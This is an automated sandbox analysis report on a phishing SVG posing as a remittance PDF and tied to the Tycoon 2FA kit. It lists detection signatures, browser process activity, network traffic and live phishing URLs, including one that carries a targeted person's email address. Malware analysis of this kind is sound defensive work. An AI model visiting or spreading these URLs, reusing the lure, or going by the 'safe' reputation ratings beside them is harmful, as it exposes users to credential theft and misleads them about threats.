Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svg

Overview

General Information

Sample name:View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svg
Analysis ID:1643279
MD5:41618a9a79500a02f2ce111361e2c5a0
SHA1:e649faa25b0e522bb8498cf146f3e085aebeae23
SHA256:47631be11d823ac5135803c5f95782c355bca742a5bc6038039ea6e526fae9b7
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:76
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
IP address seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\VIEWRE~1.SVG MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,13598698509280980246,18089039725013681096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    dropped/chromecache_53JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      0.1.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        0.1.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.1.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            0.0.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                • Phishing
                • Compliance
                • Networking
                • System Summary

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: Yara matchFile source: dropped/chromecache_53, type: DROPPED
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svg, type: SAMPLE
                Source: https://abdxo.qdhfwaes.es/JYVwg6/#Mtomdrackett@mangrovelithium.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>EduVision - Transforming Education</title> <style> body { font-family: 'Segoe UI', Tahoma, Genev...
                Source: https://abdxo.qdhfwaes.es/JYVwg6/#Mtomdrackett@mangrovelithium.comHTTP Parser: No favicon
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49692 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.68:443 -> 192.168.2.16:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49728 version: TLS 1.2
                Source: global trafficTCP traffic: 192.168.2.16:49694 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
                Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
                Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
                Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /JYVwg6/ HTTP/1.1Host: abdxo.qdhfwaes.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /chiriya!efabej HTTP/1.1Host: mmeb6h.ptkeol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://abdxo.qdhfwaes.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://abdxo.qdhfwaes.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficDNS traffic detected: DNS query: abdxo.qdhfwaes.es
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mmeb6h.ptkeol.ru
                Source: unknownHTTP traffic detected: POST /report/v4?s=7LZPigoFhvALOM1VTa7BK1%2FMbIxCPLKX%2FKudtsWlmV%2FxPZHTNSeJEWl%2Bk84ToP3t2%2FLG%2BJuDJCXY9d8AEN9ZSUTliM6b23KKlLPuwWinOaWH1GvUVxg9MeD%2Bb9izWV2GXbw2V%2BIk HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 501Content-Type: application/reports+jsonOrigin: https://cdnjs.cloudflare.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49692 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.68:443 -> 192.168.2.16:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49728 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6252_1657277593Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6252_1657277593Jump to behavior
                Source: classification engineClassification label: mal76.phis.winSVG@20/6@16/9
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\VIEWRE~1.SVG
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,13598698509280980246,18089039725013681096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,13598698509280980246,18089039725013681096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
                Process Injection                		1
                Masquerading                		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Process Injection                		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                File Deletion                		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
                Ingress Tool Transfer                		Traffic DuplicationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1643279 Sample: View Remittance_18_032025.P... Startdate: 19/03/2025 Architecture: WINDOWS Score: 76 20 Yara detected Tycoon 2FA PaaS 2->20 22 Yara detected Obfuscation Via HangulCharacter 2->22 24 Yara detected Invisible JS 2->24 26 2 other signatures 2->26 6 chrome.exe 2 2->6         started        process3 dnsIp4 12 192.168.2.16, 138, 443, 49597 unknown unknown 6->12 9 chrome.exe 6->9         started        process5 dnsIp6 14 www.google.com 142.250.186.68, 443, 49710, 49731 GOOGLEUS United States 9->14 16 a.nel.cloudflare.com 35.190.80.1, 443, 49706, 49727 GOOGLEUS United States 9->16 18 6 other IPs or domains 9->18

                Screenshots

                Download Video

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://abdxo.qdhfwaes.es/JYVwg6/0%Avira URL Cloudsafe
                https://mmeb6h.ptkeol.ru/chiriya!efabej0%Avira URL Cloudsafe

                Domains and IPs

                Download Network PCAP: filteredfull

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                a.nel.cloudflare.com
                		35.190.80.1
                		truefalse
                  		high
                  code.jquery.com
                  		151.101.2.137
                  		truefalse
                    		high
                    developers.cloudflare.com
                    		104.16.2.189
                    		truefalse
                      		high
                      cdnjs.cloudflare.com
                      		104.17.24.14
                      		truefalse
                        		high
                        challenges.cloudflare.com
                        		104.18.94.41
                        		truefalse
                          		high
                          mmeb6h.ptkeol.ru
                          		188.114.97.3
                          		truefalse
                            		unknown
                            www.google.com
                            		142.250.186.68
                            		truefalse
                              		high
                              abdxo.qdhfwaes.es
                              		188.114.96.3
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://mmeb6h.ptkeol.ru/chiriya!efabejfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  		high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    		high
                                    https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                      		high
                                      https://abdxo.qdhfwaes.es/JYVwg6/#Mtomdrackett@mangrovelithium.comfalse
                                        		unknown
                                        https://developers.cloudflare.com/favicon.pngfalse
                                          		high
                                          https://abdxo.qdhfwaes.es/JYVwg6/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.186.68
                                            		www.google.comUnited States
                                            		15169GOOGLEUSfalse
                                            104.17.24.14
                                            		cdnjs.cloudflare.comUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            104.18.94.41
                                            		challenges.cloudflare.comUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            151.101.2.137
                                            		code.jquery.comUnited States
                                            		54113FASTLYUSfalse
                                            188.114.97.3
                                            		mmeb6h.ptkeol.ruEuropean Union
                                            		13335CLOUDFLARENETUSfalse
                                            188.114.96.3
                                            		abdxo.qdhfwaes.esEuropean Union
                                            		13335CLOUDFLARENETUSfalse
                                            35.190.80.1
                                            		a.nel.cloudflare.comUnited States
                                            		15169GOOGLEUSfalse
                                            104.16.2.189
                                            		developers.cloudflare.comUnited States
                                            		13335CLOUDFLARENETUSfalse

                                            Private

                                            IP
                                            192.168.2.16

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1643279
                                            Start date and time:2025-03-19 17:55:12 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 3m 55s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svg
                                            Detection:MAL
                                            Classification:mal76.phis.winSVG@20/6@16/9
                                            Cookbook Comments:
                                            • Found application associated with file extension: .svg
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.184.195, 142.250.185.238, 64.233.167.84, 199.232.210.172, 142.250.186.110, 142.250.185.110, 172.217.16.206, 142.250.184.238, 142.250.185.142, 142.250.186.46, 172.217.18.14, 216.58.212.163, 216.58.206.35, 142.250.185.163, 142.250.184.206, 216.58.206.78, 142.250.181.238, 142.250.186.142, 20.12.23.50, 23.199.214.10
                                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            151.101.2.137http://facebooksecurity.blogspot.co.uk/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.7.min.js
                                            http://facebooksecurity.blogspot.ro/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.7.min.js
                                            http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-3.3.1.min.js
                                            http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.7.min.js
                                            http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.11.3.min.js
                                            http://applela.za.com/isignesp.php?id=Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.11.3.min.js
                                            http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.9.1.js
                                            http://awqffg.newburuan2023.biz.id/next.phpGet hashmaliciousHTMLPhisherBrowse
                                            • code.jquery.com/jquery-1.10.2.min.js
                                            104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                            http://vtaurl.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
